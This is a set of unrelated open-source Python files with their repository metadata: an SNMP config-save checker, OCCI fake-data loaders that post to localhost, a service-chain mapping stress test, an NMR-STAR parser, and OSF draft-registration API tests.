request.addfinalizer(remove_registry)
return add_registry_resp, request.param
| {
"content_hash": "f29b3485e313928a0fe08620c0227468",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 88,
"avg_line_length": 35.670731707317074,
"alnum_prop": 0.6564102564102564,
"repo_name": "anchore/anchore-engine",
"id": "96e9b7ca5a5e0e79b6e47a5a0fa7dd348df8f562",
"size": "2925",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/functional/services/api/registries/conftest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "3889"
},
{
"name": "Dockerfile",
"bytes": "10954"
},
{
"name": "Makefile",
"bytes": "12274"
},
{
"name": "Python",
"bytes": "4529553"
},
{
"name": "Shell",
"bytes": "16598"
}
],
"symlink_target": ""
} |
'''
Scriot that gets
# Uptime when running config last changed
ccmHistoryRunningLastChanged = '1.3.6.1.4.1.9.9.43.1.1.1.0'
and
# Uptime when startup config last saved
ccmHistoryStartupLastChanged = '1.3.6.1.4.1.9.9.43.1.1.3.0'
compare them and decided whether or not latest changes in running-config are saved in startup-config
'''
# Import Kirk`s module
from snmp_helper import snmp_get_oid, snmp_extract
# Define variables
device = "1.1.1.1"
community = "*****"
snmp_port = "161"
run_last_change_oid = "1.3.6.1.4.1.9.9.43.1.1.1.0"
start_last_change_oid = "1.3.6.1.4.1.9.9.43.1.1.3.0"
sys_uptime_oid = "1.3.6.1.2.1.1.3.0"
# Define device tuple
a_device = (device, community, snmp_port)
#Query data
run_last_change = snmp_extract(snmp_get_oid(a_device, run_last_change_oid,))
start_last_change = snmp_extract(snmp_get_oid(a_device, start_last_change_oid,))
sys_uptime = snmp_extract(snmp_get_oid(a_device, sys_uptime_oid,))
#Convert data in integer
if run_last_change.isdigit() and start_last_change.isdigit() and sys_uptime.isdigit():
run_last_change = int(run_last_change)
start_last_change = int(start_last_change)
sys_uptime = int(sys_uptime)
else:
exit("Error with SNMP response (non digits)")
if start_last_change == 0 and run_last_change > 3000:
exit("Config was never saved to startup since last reboot, but running-config was changed")
if start_last_change >= run_last_change:
exit("All right, last changes was saved to startup config")
else:
dif_time = (sys_uptime - start_last_change) / 100
exit("Last changes to running config wasn't saved to startup %d seconds already" % dif_time)
# The END
| {
"content_hash": "3bec1725bb7e37c4e6e6605f403cffa7",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 100,
"avg_line_length": 33.816326530612244,
"alnum_prop": 0.7054918527459264,
"repo_name": "laetrid/learning",
"id": "32ef61edf06763f7141919e6308f628ea3892a84",
"size": "1680",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Second_course/ex1_2.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "56054"
}
],
"symlink_target": ""
} |
"""
Created on Jun 19, 2012
@author: Bilel Msekni
@contact: bilel.msekni@telecom-sudparis.eu
@author: Houssem Medhioub
@contact: houssem.medhioub@it-sudparis.eu
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
import pyocni.TDD.fake_Data.categories as f_categories
import pyocni.TDD.fake_Data.entities as f_entities
import pycurl
def init_fakeDB():
"""
Fill the database with Fake DB
"""
add_fake_action()
add_fake_kind()
add_fake_mixin()
add_fake_resource()
def add_fake_kind():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/-/')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
c.setopt(c.POSTFIELDS, f_categories.kind)
c.setopt(c.CUSTOMREQUEST, 'POST')
c.perform()
def add_fake_mixin():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/-/')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
c.setopt(c.POSTFIELDS, f_categories.mixin)
c.setopt(c.CUSTOMREQUEST, 'POST')
c.perform()
def add_fake_action():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/-/')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
c.setopt(c.POSTFIELDS, f_categories.action)
c.setopt(c.CUSTOMREQUEST, 'POST')
c.perform()
def add_fake_resource():
c = pycurl.Curl()
c.setopt(c.URL, 'http://127.0.0.1:8090/compute/bilel/vm01')
c.setopt(c.HTTPHEADER, ['Content-Type: application/occi+json', 'Accept: application/occi+json'])
c.setopt(c.POSTFIELDS, f_entities.resource)
c.setopt(c.CUSTOMREQUEST, 'PUT')
c.perform() | {
"content_hash": "f30d8fe1d2a99ea46baf5c2414e041bd",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 100,
"avg_line_length": 29.52542372881356,
"alnum_prop": 0.6733639494833524,
"repo_name": "MarouenMechtri/CNG-Manager",
"id": "7b6ab341659cfc691ad7582a0a55bc40af770b3e",
"size": "2340",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pyocni/TDD/fake_Data/initialize_fakeDB.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "16023"
},
{
"name": "JavaScript",
"bytes": "10581"
},
{
"name": "Python",
"bytes": "451189"
}
],
"symlink_target": ""
} |
"""
Generates increasingly bigger/more Service Chain requirements for a
network topology, reports how well the algorithm performed.
"""
import getopt
import logging
import math
import random
import sys
import traceback
import CarrierTopoBuilder
import MappingAlgorithms
import UnifyExceptionTypes as uet
from collections import OrderedDict
from nffg_lib.nffg import NFFG, NFFGToolBox
def gen_seq():
while True:
yield int(math.floor(random.random() * 999999999))
log = logging.getLogger("StressTest")
log.setLevel(logging.WARN)
logging.basicConfig(format='%(levelname)s:%(name)s:%(message)s')
# dictionary of newly added VNF-s keyed by the number of 'test_lvl' when it
# was added.
helpmsg = """StressTest.py options are:
-h Print this message help message.
-o The output file where the result shall be printed.
--loops All Service Chains will be loops.
--fullremap Ignores all VNF mappings in the substrate network.
--vnf_sharing=p Sets the ratio of shared and not shared VNF-s.
--request_seed=i Provides seed for the random generator.
--bw_factor=f Controls the importance between bandwidth, infra resources
--res_factor=f and distance in latency during the mapping process. The
--lat_factor=f factors are advised to be summed to 3, if any is given the
others shall be given too!
--bt_limit=i Backtracking depth limit of the mapping algorithm (def.: 6).
--bt_br_factor=i Branching factor of the backtracking procedure of the
mapping algorithm (default is 3).
--multiple_scs One request will contain at least 2 chains with vnf sharing
probability defined by "--vnf_sharing_same_sg" option.
--vnf_sharing_same_sg=p The conditional probablilty of sharing a VNF with the
current Service Graph, if we need to share a VNF
determined by "--vnf_sharing"
--max_sc_count=i Determines how many chains should one request contain
at most.
--batch_length=f The number of time units to wait for Service Graphs, that
should be batched and mapped together by the algorithm. The
expected arrival time difference is 1.0 between SG-s.
--shareable_sg_count=i The number of last 'i' Service Graphs which could
be used for sharing VNFs. Default value is unlimited.
--sliding_share If not set, the set of shareable SG-s is emptied after
successfull batched mapping.
--use_saps_once If set, all SAPs can only be used once as SC origin and
once as SC destination.
--poisson Generate arrival time differneces with lambda=1.0 Exponential
distribution.
--topo_name=<<gwin|picotopo>>
"""
def _shareVNFFromEarlierSG(nffg, running_nfs, nfs_this_sc, p):
sumlen = sum([l*i for l,i in zip([len(running_nfs[n]) for n in running_nfs],
xrange(1,len(running_nfs)+1))])
i = 0
ratio = float(len(running_nfs.values()[i])) / sumlen
while ratio < p:
i += 1
ratio += float((i+1)*len(running_nfs.values()[i])) / sumlen
nf = random.choice(running_nfs.values()[i])
if reduce(lambda a,b: a and b, [v in nfs_this_sc for v
in running_nfs.values()[i]]):
# failing to add a VNF due to this criteria infuences the provided
# vnf_sharing_probabilty, but it is estimated to be insignificant,
# otherwise the generation can run into infinite loop!
log.warn("All the VNF-s of the subchain selected for VNF sharing are"
" already in the current chain under construction! Skipping"
" VNF sharing...")
return False, None
else:
while nf in nfs_this_sc:
nf = random.choice(running_nfs.values()[i])
if nf in nffg.nfs:
return False, nf
else:
nffg.add_node(nf)
return True, nf
def generateRequestForCarrierTopo(test_lvl, all_saps_beginning,
all_saps_ending,
running_nfs, loops=False,
use_saps_once=True,
vnf_sharing_probabilty=0.0,
vnf_sharing_same_sg=0.0,
shareable_sg_count=9999999999999999,
multiSC=False, max_sc_count=2):
"""
By default generates VNF-disjoint SC-s starting/ending only once in each SAP.
With the 'loops' option, only loop SC-s are generated.
'vnf_sharing_probabilty' determines the ratio of
#(VNF-s used by at least two SC-s)/#(not shared VNF-s).
NOTE: some kind of periodicity is included to make the effect of batching
visible. But it is (and must be) independent of the batch_length.
WARNING!! batch_length meaining is changed if --poisson is set!
Generate exponential arrival time for VNF-s to make Batching more reasonable.
inter arrival time is Exp(1) so if we are batching for 4 time units, the
expected SG count is 4, because the sum of 4 Exp(1) is Exp(4).
BUT we wait for 1 SG at least, but if by that time 4 units has already passed,
map the SG alone (unbatched).
"""
chain_maxlen = 8
sc_count=1
# maximal possible bandwidth for chains
max_bw = 7.0
if multiSC:
sc_count = random.randint(2,max_sc_count)
while len(all_saps_ending) > sc_count and len(all_saps_beginning) > sc_count:
nffg = NFFG(id="Benchmark-Req-"+str(test_lvl)+"-Piece")
# newly added NF-s of one request
current_nfs = []
for scid in xrange(0,sc_count):
# find two SAP-s for chain ends.
nfs_this_sc = []
sap1 = nffg.add_sap(id = all_saps_beginning.pop() if use_saps_once else \
random.choice(all_saps_beginning))
sap2 = None
if loops:
sap2 = sap1
else:
tmpid = all_saps_ending.pop() if use_saps_once else \
random.choice(all_saps_ending)
while True:
if tmpid != sap1.id:
sap2 = nffg.add_sap(id = tmpid)
break
else:
tmpid = all_saps_ending.pop() if use_saps_once else \
random.choice(all_saps_ending)
sg_path = []
sap1port = sap1.add_port()
last_req_port = sap1port
# generate some VNF-s connecting the two SAP-s
vnf_cnt = next(gen_seq()) % chain_maxlen + 1
for vnf in xrange(0, vnf_cnt):
# in the first case p is used to determine which previous chain should
# be used to share the VNF, in the latter case it is used to determine
# whether we should share now.
vnf_added = False
p = random.random()
if random.random() < vnf_sharing_probabilty and len(running_nfs) > 0 \
and not multiSC:
vnf_added, nf = _shareVNFFromEarlierSG(nffg, running_nfs, nfs_this_sc,
p)
elif multiSC and \
p < vnf_sharing_probabilty and len(current_nfs) > 0 \
and len(running_nfs) > 0:
# this influences the the given VNF sharing probability...
if reduce(lambda a,b: a and b, [v in nfs_this_sc for
v in current_nfs]):
log.warn("All shareable VNF-s are already added to this chain! "
"Skipping VNF sharing...")
elif random.random() < vnf_sharing_same_sg:
nf = random.choice(current_nfs)
while nf in nfs_this_sc:
nf = random.choice(current_nfs)
# the VNF is already in the subchain, we just need to add the links
# vnf_added = True
else:
# this happens when VNF sharing is needed but not with the actual SG
vnf_added, nf = _shareVNFFromEarlierSG(nffg, running_nfs,
nfs_this_sc, p)
else:
nf = nffg.add_nf(id="-".join(("Test",str(test_lvl),"SC",str(scid),
"VNF",str(vnf))),
func_type=random.choice(['A','B','C']),
cpu=random.randint(1 + (2 if test_lvl%4 == 3 else 0),
4 + (6 if test_lvl%4 == 3 else 0)),
mem=random.random()*1000 + \
(1000 if test_lvl%4 > 1 else 0),
storage=random.random()*3 + \
(6 if test_lvl%4 > 1 else 0),
delay=1 + random.random()*10,
bandwidth=random.random())
vnf_added = True
if vnf_added:
# add olny the newly added VNF-s, not the shared ones.
nfs_this_sc.append(nf)
newport = nf.add_port()
sglink = nffg.add_sglink(last_req_port, newport)
sg_path.append(sglink.id)
last_req_port = nf.add_port()
sap2port = sap2.add_port()
sglink = nffg.add_sglink(last_req_port, sap2port)
sg_path.append(sglink.id)
# WARNING: this is completly a wild guess! Failing due to this doesn't
# necessarily mean algorithm failure
# Bandwidth maximal random value should be min(SAP1acces_bw, SAP2access_bw)
# MAYBE: each SAP can only be once in the reqgraph? - this is the case now.
if multiSC:
minlat = 5.0 * (len(nfs_this_sc) + 2)
maxlat = 13.0 * (len(nfs_this_sc) + 2)
else:
# nfcnt = len([i for i in nffg.nfs])
minlat = 45.0 - 10.0*(test_lvl%4)
maxlat = 60.0 - 12.25*(test_lvl%4)
nffg.add_req(sap1port, sap2port, delay=random.uniform(minlat,maxlat),
bandwidth=random.random()*(max_bw + test_lvl%4),
sg_path = sg_path)
log.info("Service Chain on NF-s added: %s"%[nf.id for nf in nfs_this_sc])
# this prevents loops in the chains and makes new and old NF-s equally
# preferable in total for NF sharing
new_nfs = [vnf for vnf in nfs_this_sc if vnf not in current_nfs]
for tmp in xrange(0, scid+1):
current_nfs.extend(new_nfs)
if not multiSC:
return nffg, all_saps_beginning, all_saps_ending
if multiSC:
return nffg, all_saps_beginning, all_saps_ending
return None, all_saps_beginning, all_saps_ending
def StressTestCore(seed, loops, use_saps_once, vnf_sharing, multiple_scs,
max_sc_count, vnf_sharing_same_sg, fullremap,
batch_length, shareable_sg_count, sliding_share, poisson,
topo_name,
bw_factor, res_factor, lat_factor, bt_limit, bt_br_factor,
outputfile, queue=None, shortest_paths_precalc=None,
filehandler=None):
"""
If queue is given, the result will be put in that Queue object too. Meanwhile
if shortest_paths_precalc is not given, it means the caller needs the
shortest_paths, so we send it back. In this case the resulting test_lvl will
be sent by the queue.
NOTE: outputfile is only used inside the function if an exception is thrown
and than it is logged there.
"""
total_vnf_count = 0
mapped_vnf_count = 0
network = None
if topo_name == "picotopo":
network = CarrierTopoBuilder.getPicoTopo()
elif topo_name == "gwin":
network = CarrierTopoBuilder.getSNDlib_dfn_gwin(save_to_file=True)
max_test_lvl = 50000
test_lvl = 1
all_saps_ending = [s.id for s in network.saps]
all_saps_beginning = [s.id for s in network.saps]
running_nfs = OrderedDict()
random.seed(0)
random.jumpahead(seed)
random.shuffle(all_saps_beginning)
random.shuffle(all_saps_ending)
shortest_paths = shortest_paths_precalc
ppid_pid = ""
# log.addHandler(logging.StreamHandler())
log.setLevel(logging.WARN)
if filehandler is not None:
log.addHandler(filehandler)
if shortest_paths is not None and type(shortest_paths) != dict:
excp = Exception("StressTest received something else other than shortest_"
"paths dictionary: %s"%type(shortest_paths))
if queue is not None:
queue.put(excp)
raise excp
if queue is not None:
ppid_pid = "%s.%s:"%(os.getppid(), os.getpid())
try:
try:
batch_count = 0
batched_request = NFFG(id="Benchmark-Req-"+str(test_lvl))
# built-in libs can change the state of random module during mapping.
random_state = None
while batched_request is not None:
if test_lvl > max_test_lvl:
break
if (len(all_saps_ending) < batch_length or \
len(all_saps_beginning) < batch_length) and use_saps_once:
log.warn("Can't start batching because all SAPs should only be used"
" once for SC origin and destination and there are not "
"enough SAPs!")
batched_request = None
elif batch_count < batch_length or len([nf for nf in request.nfs]) == 0:
request, all_saps_beginning, all_saps_ending = \
generateRequestForCarrierTopo(test_lvl, all_saps_beginning,
all_saps_ending, running_nfs,
loops=loops, use_saps_once=use_saps_once,
vnf_sharing_probabilty=vnf_sharing,
vnf_sharing_same_sg=vnf_sharing_same_sg,
multiSC=multiple_scs, max_sc_count=max_sc_count)
if request is None:
break
else:
batch_count += (random.expovariate(1.0) if poisson else 1)
if poisson:
log.debug("Time passed since last batched mapping: %s"%
batch_count)
running_nfs[test_lvl] = [nf for nf in request.nfs
if nf.id.split("-")[1] == str(test_lvl)]
# using merge to create the union of the NFFG-s!
batched_request = NFFGToolBox.merge_nffgs(batched_request,
request)
if len(running_nfs) > shareable_sg_count:
# make the ordered dict function as FIFO
running_nfs.popitem(last=False)
test_lvl += 1
if not sliding_share and test_lvl % shareable_sg_count == 0:
running_nfs = OrderedDict()
log.debug("Batching Service Graph number %s..."%batch_count)
else:
batch_count = 0
total_vnf_count += len([nf for nf in batched_request.nfs])
random_state = random.getstate()
network, shortest_paths = MappingAlgorithms.MAP(batched_request, network,
full_remap=fullremap, enable_shortest_path_cache=True,
bw_factor=bw_factor, res_factor=res_factor,
lat_factor=lat_factor, shortest_paths=shortest_paths,
return_dist=True,
bt_limit=bt_limit, bt_branching_factor=bt_br_factor)
log.debug(ppid_pid+"Mapping successful on test level %s with batch"
" length %s!"%(test_lvl, batch_length))
random.setstate(random_state)
mapped_vnf_count += len([nf for nf in batched_request.nfs])
batched_request = NFFG(id="Benchmark-Req-"+str(test_lvl))
except uet.MappingException as me:
log.info(ppid_pid+"Mapping failed: %s"%me.msg)
if not me.backtrack_possible:
# NOTE: peak SC count is only corret to add to test_lvl if SC-s are
# disjoint on VNFs.
if poisson:
log.warn("Peak mapped VNF count is %s in the last run, test level: "
"UNKNOWN because of Poisson"%me.peak_mapped_vnf_count)
else:
log.warn("Peak mapped VNF count is %s in the last run, test level: %s"%
(me.peak_mapped_vnf_count,
test_lvl - batch_length + \
(me.peak_sc_cnt if me.peak_sc_cnt is not None else 0)))
mapped_vnf_count += me.peak_mapped_vnf_count
log.warn("All-time peak mapped VNF count: %s, All-time total VNF "
"count %s, Acceptance ratio: %s"%(mapped_vnf_count,
total_vnf_count, float(mapped_vnf_count)/total_vnf_count))
# break
if request is None or batched_request is None:
log.warn(ppid_pid+"Request generation reached its end!")
# break
except uet.UnifyException as ue:
log.error(ppid_pid+ue.msg)
log.error(ppid_pid+traceback.format_exc())
with open(outputfile, "a") as f:
f.write("\n".join(("UnifyException cought during StressTest: ",
ue.msg,traceback.format_exc())))
if queue is not None:
queue.put(str(ue.__class__))
return test_lvl-1
except Exception as e:
log.error(ppid_pid+traceback.format_exc())
with open(outputfile, "a") as f:
f.write("\n".join(("Exception cought during StressTest: ",
traceback.format_exc())))
if queue is not None:
queue.put(str(e.__class__))
return test_lvl-1
# put the result to the queue
if queue is not None:
log.info(ppid_pid+"Putting %s to communication queue"%(test_lvl-1))
queue.put(test_lvl-1)
if shortest_paths_precalc is None:
log.info(ppid_pid+"Returning shortest_paths!")
return shortest_paths
# if returned_test_lvl is 0, we failed at the very fist mapping!
return test_lvl-1
def main(argv):
try:
opts, args = getopt.getopt(argv,"ho:",["loops", "fullremap", "bw_factor=",
"res_factor=", "lat_factor=", "request_seed=",
"vnf_sharing=", "multiple_scs", "poisson",
"vnf_sharing_same_sg=", "max_sc_count=",
"shareable_sg_count=", "batch_length=",
"bt_br_factor=", "bt_limit=",
"sliding_share", "use_saps_once",
"topo_name="])
except getopt.GetoptError:
print helpmsg
sys.exit()
loops = False
fullremap = False
vnf_sharing = 0.0
vnf_sharing_same_sg = 0.0
seed = 3
bw_factor = 1
res_factor = 1
lat_factor = 1
outputfile = "paramsearch.out"
multiple_scs = False
sliding_share = False
use_saps_once = False
poisson = False
max_sc_count = 2
shareable_sg_count = 99999999999999
batch_length = 1
bt_br_factor = 6
bt_limit = 3
topo_name = "picotopo"
for opt, arg in opts:
if opt == '-h':
print helpmsg
sys.exit()
elif opt == '-o':
outputfile = arg
elif opt == "--loops":
loops = True
elif opt == "--fullremap":
fullremap = True
elif opt == "--request_seed":
seed = int(arg)
elif opt == "--vnf_sharing":
vnf_sharing = float(arg)
elif opt == "--bw_factor":
bw_factor = float(arg)
elif opt == "--res_factor":
res_factor = float(arg)
elif opt == "--lat_factor":
lat_factor = float(arg)
elif opt == "--multiple_scs":
multiple_scs = True
elif opt == "--max_sc_count":
max_sc_count = int(arg)
elif opt == "--vnf_sharing_same_sg":
vnf_sharing_same_sg = float(arg)
elif opt == "--shareable_sg_count":
shareable_sg_count = int(arg)
elif opt == "--batch_length":
batch_length = float(arg)
elif opt == "--sliding_share":
sliding_share = True
elif opt == "--use_saps_once":
use_saps_once = True
elif opt == "--bt_limit":
bt_limit = int(arg)
elif opt == "--bt_br_factor":
bt_br_factor = int(arg)
elif opt == "--poisson":
poisson = True
elif opt == "--topo_name":
topo_name = arg
params, args = zip(*opts)
if "--bw_factor" not in params or "--res_factor" not in params or \
"--lat_factor" not in params:
print helpmsg
raise Exception("Not all algorithm params are given!")
returned_test_lvl = StressTestCore(seed, loops, use_saps_once, vnf_sharing,
multiple_scs, max_sc_count, vnf_sharing_same_sg, fullremap,
batch_length, shareable_sg_count, sliding_share, poisson, topo_name,
bw_factor, res_factor, lat_factor, bt_limit, bt_br_factor, outputfile)
log.info("First unsuccessful mapping was at %s test level."%
(returned_test_lvl+1))
if returned_test_lvl > 0:
with open(outputfile, "a") as f:
f.write("\nLast successful mapping was at %s test level.\n"%
(returned_test_lvl))
else:
with open(outputfile, "a") as f:
f.write("\nMapping failed at starting test level (%s)\n"%(returned_test_lvl+1))
if __name__ == '__main__':
main(sys.argv[1:])
| {
"content_hash": "cd8cf872695fe0a9690e2de5f6477f36",
"timestamp": "",
"source": "github",
"line_count": 486,
"max_line_length": 87,
"avg_line_length": 42.74485596707819,
"alnum_prop": 0.583902955617599,
"repo_name": "hsnlab/mapping",
"id": "209f766bd9e7184296b487183ba5265a4acd37f1",
"size": "21349",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "alg1/utils/StressTest-sc8decent.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Game Maker Language",
"bytes": "14294"
},
{
"name": "Python",
"bytes": "760651"
},
{
"name": "Roff",
"bytes": "73"
},
{
"name": "Shell",
"bytes": "871"
}
],
"symlink_target": ""
} |
from nmrpystar import starast
from nmrpystar.unparse.maybeerror import MaybeError
class Loop(starast.StarBase):
def __init__(self, keys, rows):
if not isinstance(keys, list):
raise TypeError('Loop needs list of keys')
if len(keys) != len(set(keys)):
raise ValueError('Loop requires unique keys')
if not isinstance(rows, list):
raise TypeError('Loop needs list of rows')
for r in rows:
if not isinstance(r, list):
raise TypeError('Loop rows must be lists')
if len(r) != len(keys):
raise ValueError('Loop row: %i keys, but %i values' % (len(keys), len(r)))
self.keys = keys
self.rows = rows
def toJSONObject(self):
return {'type': 'Loop',
'keys': self.keys,
'rows': self.rows}
def getRowAsDict(self, rowIndex):
return dict(zip(self.keys, self.rows[rowIndex]))
class Save(starast.StarBase):
def __init__(self, prefix, category, datums, loops):
if not isinstance(datums, dict):
raise TypeError('saveframe datums must be a dict')
if not isinstance(loops, dict):
raise TypeError('saveframe loops must be a dict')
self.prefix = prefix
self.category = category
self.datums = datums
self.loops = loops
def toJSONObject(self):
loops = dict([(name, loop.toJSONObject()) for (name, loop) in self.loops.items()])
return {'type' : 'Save',
'datums' : self.datums,
'prefix' : self.prefix,
'category' : self.category,
'loops' : loops}
class Data(starast.StarBase):
def __init__(self, name, saves):
self.name = name
if not isinstance(saves, dict):
raise TypeError(('save frames must be a dict', saves, type(saves)))
self.saves = saves
def toJSONObject(self):
return {'type' : 'Data',
'name' : self.name,
'save frames': dict((k, s.toJSONObject()) for (k, s) in self.saves.items())}
class ASTError(ValueError):
def __init__(self, error):
self.error = error
def __repr__(self):
return repr({'type': 'ASTError', 'error': self.error})
def __str__(self):
return repr(self)
def bad(**kwargs):
raise ASTError(kwargs)
def parse_ident(string):
"""
yes:
abc.def
Assigned_chem_shift.ID
no:
abc
.abc
abc.
.
"""
dot_index = string.find('.')
if dot_index == -1:
bad(nodetype='identifier', message='missing prefix', key=string)
elif dot_index == 0:
bad(nodetype='identifier', message='invalid empty prefix', key=string)
elif dot_index == len(string) - 1:
bad(nodetype='identifier', message='invalid key postfix', key=string)
return (string[:dot_index], string[dot_index+1:])
def build_loop(loop):
'''
ASTLoop -> (String, NMRSTAR-ASTLoop)
0. 1+ keys
1. consistent key prefix
'''
# 0. 1+ keys
if len(loop.keys) == 0:
bad(nodetype='loop', message='0 keys', loop=loop)
prefixes, keys = set([]), []
for node in loop.keys:
pre, key = parse_ident(node)
prefixes.add(pre)
keys.append(key)
# 1. consistent key prefix
if len(prefixes) != 1:
bad(nodetype='loop', message='inconsistent loop prefix',
prefixes=prefixes)
prefix = list(prefixes)[0]
return (prefix, Loop(keys, loop.rows))
def build_save(name, save):
'''
0. 1+ keys
1. consistent key prefixes
2. presence of Sf_framecode and Sf_category keys
3. matching of Sf_framecode value to save frame name
4. duplicate loop prefixes
'''
loops, datums = {}, {}
# 0.
if len(save.datums) == 0:
bad(nodetype='save', message='missing key/values', save=save)
prefixes = set([])
for (ident, value) in save.datums.items():
pre, key = parse_ident(ident)
prefixes.add(pre)
datums[key] = value
# 1.
if len(set(prefixes)) != 1:
bad(nodetype='save', message='inconsistent prefixes',
prefixes=prefixes)
prefix = list(prefixes)[0]
# 2.
for required_key in ['Sf_framecode', 'Sf_category']:
# TODO what about Entry_ID and ID?
if required_key not in datums:
mess = 'missing key "%s"' % required_key
bad(nodetype='save', message=mess)
# 3.
fcode = datums.pop('Sf_framecode')
if fcode != name:
bad(nodetype='save', expected=name, actual=fcode,
message='Sf_framecode does not match save frame name')
category = datums.pop('Sf_category')
# 4.
for my_loop in save.loops :
(loop_prefix, loop) = build_loop(my_loop)
if loop_prefix in loops:
bad(nodetype='save', message='duplicate loop prefix',
prefix=loop_prefix)
loops[loop_prefix] = loop
return Save(prefix, category, datums, loops)
def build_data(data):
saves = {}
for (name, my_save) in data.saves.items():
save = build_save(name, my_save)
saves[name] = save
return Data(data.name, saves)
def build_nmrstar_ast(data):
if not isinstance(data, starast.Data):
raise TypeError(("expected starast.Data node", data))
try:
return MaybeError.pure(build_data(data))
except ASTError as e:
return MaybeError.error(e.error)
| {
"content_hash": "a45892b7ff6714f4576f49ed4b254840",
"timestamp": "",
"source": "github",
"line_count": 194,
"max_line_length": 92,
"avg_line_length": 28.685567010309278,
"alnum_prop": 0.568733153638814,
"repo_name": "mattfenwick/NMRPyStar",
"id": "1933bcfef402bb8b4afa50d80e5253717392b2d3",
"size": "5565",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nmrpystar/nmrstarast.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "63036"
},
{
"name": "Shell",
"bytes": "364"
}
],
"symlink_target": ""
} |
import pytest
from api.base.settings.defaults import API_BASE
from osf.models import MetaSchema
from osf_tests.factories import (
ProjectFactory,
RegistrationFactory,
AuthUserFactory,
CollectionFactory,
DraftRegistrationFactory,
)
from website.project.metadata.schemas import LATEST_SCHEMA_VERSION
from website.project.metadata.utils import create_jsonschema_from_metaschema
from website.settings import PREREG_ADMIN_TAG
from website.util import permissions
@pytest.mark.django_db
class DraftRegistrationTestCase:
@pytest.fixture()
def user(self):
return AuthUserFactory()
@pytest.fixture()
def user_write_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_read_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def user_non_contrib(self):
return AuthUserFactory()
@pytest.fixture()
def project_public(self, user, user_write_contrib, user_read_contrib):
project_public = ProjectFactory(is_public=True, creator=user)
project_public.add_contributor(user_write_contrib, permissions=[permissions.WRITE])
project_public.add_contributor(user_read_contrib, permissions=[permissions.READ])
project_public.save()
return project_public
@pytest.fixture()
def prereg_metadata(self):
def metadata(draft):
test_metadata = {}
json_schema = create_jsonschema_from_metaschema(draft.registration_schema.schema)
for key, value in json_schema['properties'].iteritems():
response = 'Test response'
if value['properties']['value'].get('enum'):
response = value['properties']['value']['enum'][0]
if value['properties']['value'].get('properties'):
response = {'question': {'value': 'Test Response'}}
test_metadata[key] = {'value': response}
return test_metadata
return metadata
@pytest.mark.django_db
class TestDraftRegistrationList(DraftRegistrationTestCase):
@pytest.fixture()
def schema(self):
return MetaSchema.objects.get(name='Open-Ended Registration', schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def draft_registration(self, user, project_public, schema):
return DraftRegistrationFactory(
initiator=user,
registration_schema=schema,
branched_from=project_public
)
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(API_BASE, project_public._id)
def test_admin_can_view_draft_list(self, app, user, draft_registration, schema, url_draft_registrations):
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
def test_cannot_view_draft_list(self, app, user_write_contrib, user_read_contrib, user_non_contrib, url_draft_registrations):
# test_read_only_contributor_cannot_view_draft_list
res = app.get(url_draft_registrations, auth=user_read_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_read_write_contributor_cannot_view_draft_list
res = app.get(url_draft_registrations, auth=user_write_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_logged_in_non_contributor_cannot_view_draft_list
res = app.get(url_draft_registrations, auth=user_non_contrib.auth, expect_errors=True)
assert res.status_code == 403
# test_unauthenticated_user_cannot_view_draft_list
res = app.get(url_draft_registrations, expect_errors=True)
assert res.status_code == 401
def test_draft_with_registered_node_does_not_show_up_in_draft_list(self, app, user, project_public, draft_registration, url_draft_registrations):
reg = RegistrationFactory(project = project_public)
draft_registration.registered_node = reg
draft_registration.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_draft_with_deleted_registered_node_shows_up_in_draft_list(self, app, user, project_public, draft_registration, schema, url_draft_registrations):
reg = RegistrationFactory(project=project_public)
draft_registration.registered_node = reg
draft_registration.save()
reg.is_deleted = True
reg.save()
res = app.get(url_draft_registrations, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['attributes']['registration_supplement'] == schema._id
assert data[0]['id'] == draft_registration._id
assert data[0]['attributes']['registration_metadata'] == {}
@pytest.mark.django_db
class TestDraftRegistrationCreate(DraftRegistrationTestCase):
@pytest.fixture()
def metaschema_open_ended(self):
return MetaSchema.objects.get(name='Open-Ended Registration', schema_version=LATEST_SCHEMA_VERSION)
@pytest.fixture()
def payload(self, metaschema_open_ended):
return {
'data': {
'type': 'draft_registrations',
'attributes': {
'registration_supplement': metaschema_open_ended._id
}
}
}
@pytest.fixture()
def url_draft_registrations(self, project_public):
return '/{}nodes/{}/draft_registrations/'.format(API_BASE, project_public._id)
